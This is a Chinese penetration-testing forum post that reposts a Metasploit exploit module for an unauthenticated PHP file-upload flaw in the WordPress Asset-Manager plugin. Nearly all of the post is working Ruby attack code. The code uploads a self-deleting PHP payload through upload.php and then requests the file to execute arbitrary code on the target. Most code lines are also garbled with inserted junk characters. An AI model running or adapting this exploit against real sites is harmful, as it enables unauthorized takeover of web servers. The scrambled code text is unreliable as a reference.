找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2405|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
( m$ N: k: n" C2 P5 n1 X0 l/ E3 t
& q" s% O$ X4 O  x) r##
  H6 W& K, d  |. o  I# This file is part of the Metasploit Framework and may be subject to
% p6 H: g2 J. z  P# redistribution and commercial restrictions. Please see the Metasploit0 Y/ _9 ^* d9 U9 ^. J
# Framework web site for more information on licensing and terms of use.
6 ]0 }2 R7 d* W/ ~9 p; g$ D/ `#   http://metasploit.com/framework/: {' Y7 e% l' _4 o3 `
##
8 R) G, h+ ^1 g1 H& D6 D+ `1 ` 5 a; W1 M% E: Q5 D, t
require 'msf/core'
- W8 s( ?: j8 O2 g( p/ L9 H, Y/ w$ |/ [4 Rrequire 'msf/core/exploit/php_exe'
. w9 l, z' ]8 [; t. ?, R+ F
& n/ o  J' A+ Wclass Metasploit3 < Msf::Exploit::Remote0 O6 `+ n3 A6 L8 b" A( r
  Rank = ExcellentRanking8 i0 l$ N6 Q! ?1 U

& c! \1 O: p: Y+ K: e  include Msf::Exploit::Remote::HttpClient
$ k: [" t$ f5 X( b  include Msf::Exploit:hpEXE6 v1 P) n4 X! w) m. o% c

7 ?  s4 a- X5 J: N0 e& J  def initialize(info = {})) E" i7 v1 o4 e3 W% i$ j; b
    super(update_info(info,3 k, |0 y  Y& G
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',8 Z) L( m$ J5 ]% e  C* u  u( G  a
      'Description'    => %q{
6 q3 |9 Y* |4 F* ?        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
( V1 C& y; B8 n4 X1 n# g9 k        plugin.  By abusing the upload.php file, a malicious user can upload a file to a% m- {' M* j" `5 X6 }) H
        temp directory without authentication, which results in arbitrary code execution.
- R2 M# X' D2 o$ U3 ?      },
# q4 {( r# B8 ], T( w      'Author'         =>
( ]& Y9 y5 E9 ~3 L$ w, m4 e        [0 W' [' e0 j$ t) b; f( L
          'Sammy FORGIT', # initial discovery
/ V/ N7 j$ z6 o7 ^) e; J          'James Fitts <fitts.james[at]gmail.com>' # metasploit module  n) e3 e7 H8 r
        ],
! P4 W, I6 h  [$ P& W3 [7 k3 g      'License'        => MSF_LICENSE," s8 Z  b" f5 y& @* F
      'References'     =>% c# _+ L8 A9 ?9 [' @7 q
        [+ C$ B/ [- D: Y; P( ^
          [ 'OSVDB', '82653' ],
% |% Z, r4 Q9 C2 O          [ 'BID', '53809' ],
. ]+ [! E; a' O* h) i3 d' D8 ^          [ 'EDB', '18993' ],
: G/ B( a+ l& J; X7 A+ u! H5 y          [ 'URL', 'http:// www.myhack58.com /' ]
; ?6 Y& k0 [' m9 O  b! ?        ],
; l# ?# W& L* o0 [" E      'Payload'       =>
+ S" F' m& g" @* l  }        {/ J/ q1 {) ~; f2 N$ `+ {; \) A7 M. M
          'BadChars' => "\x00",$ p7 v) K5 W0 S( _9 k; s! X4 |' ]
        },( d3 q, B, Q1 l" n, c* G! {
      'Platform'       => 'php',
! r# Q& G3 t7 [! n      'Arch'           => ARCH_PHP,8 j9 i  A6 y( g; c
      'Targets'        =>4 t3 H7 ^2 ]8 T6 y7 p" H
        [
: f1 U4 B, H! n% A% G$ ^7 u          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
: U. J! ?+ o* I3 k          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
2 m: N, q1 o5 o  n$ V+ j        ]," c9 V0 V5 T( Q/ Y! r" H
      'DefaultTarget' => 0,5 z- m' ?2 K3 i2 C2 t) @" l+ ]+ v
      'DisclosureDate' => 'May 26 2012'))0 d9 F! a% H% r; N% \

7 s% T! R% h# Z8 i" z    register_options(* O0 c+ ^' Y" \9 I
      [  p& T$ A- K& P
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
- X6 k) @( N' O4 e1 d      ], self.class)4 E4 x8 u4 W& n; {' e
  end
0 |0 l- H2 b( j& U3 k
* E' w& y* W2 I( c  def exploit
) S+ |1 v" d" ~* e( _! K    uri =  target_uri.path3 G# o: X  f7 V, a  w
    uri << '/' if uri[-1,1] != '/'( j; A8 W3 @1 D7 {& l# B8 w& @( w* C
    peer = "#{rhost}:#{rport}"& r, \3 i# ?2 J% j3 |0 E5 s3 Y2 u( ?% S
    payload_name = "#{rand_text_alpha(5)}.php"
0 S+ q) \2 L% P7 O0 K5 s' x3 M) C: L    php_payload = get_write_exec_payload(:unlink_self=>true)
2 A) n  G- H! Z7 H; M1 j2 r3 m
/ i) r' q6 x! U+ q" T    data = Rex::MIME::Message.new! }# @1 J( d% x/ A7 i  U' ?5 P  e
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")% {# {1 B4 P* p: e% p
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
: [4 _, s0 M. ?0 u
( o8 |0 i* N0 O( w* s/ i    print_status("#{peer} - Uploading payload #{payload_name}"): Q) B4 s8 n% K8 j" l
    res = send_request_cgi({
( M# p+ y: g  J# R/ t      'method'  => 'POST',
( K  D2 q8 m6 ?9 T; F% D/ R      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",6 m0 R% L5 r0 d5 L( I
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
4 S1 |( A! |* i5 g$ T      'data'    => post_data7 D( i3 e) H: o: B2 X2 a' f- U
    })
/ I) b: [2 `( @! L9 f0 i7 } / z( o, e+ o, g/ a* P' m3 i, K, d+ n
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
0 A" g9 K9 |0 [2 w2 Y0 c% h      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")- J0 y# ~! x4 B
end
1 z% x, A" L8 r& F
. V# |( y, n5 O0 M7 d3 U    print_status("#{peer} - Executing payload #{payload_name}")2 u: H4 Q5 s+ l# q8 A
    res = send_request_raw({7 a( `2 {) V* u/ F$ M) v
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",: X! ^9 j* @& h
      'method'  => 'GET'
. u# _8 R3 S( z/ R/ G! O- P    })! [) J. k4 T6 y2 Y
5 z. S6 v3 g8 Y: j
    if res and res.code != 200
6 l( @4 y% K7 Q* c      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
" `5 Y2 c4 ~" U2 V! B" j    end
0 f) v& i6 T/ q' E/ h& n) z, w' i; s  end) ~( W2 z4 Z! Q2 c) r, R4 U
end& Y2 r1 C8 A2 r; _9 c( y6 U
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表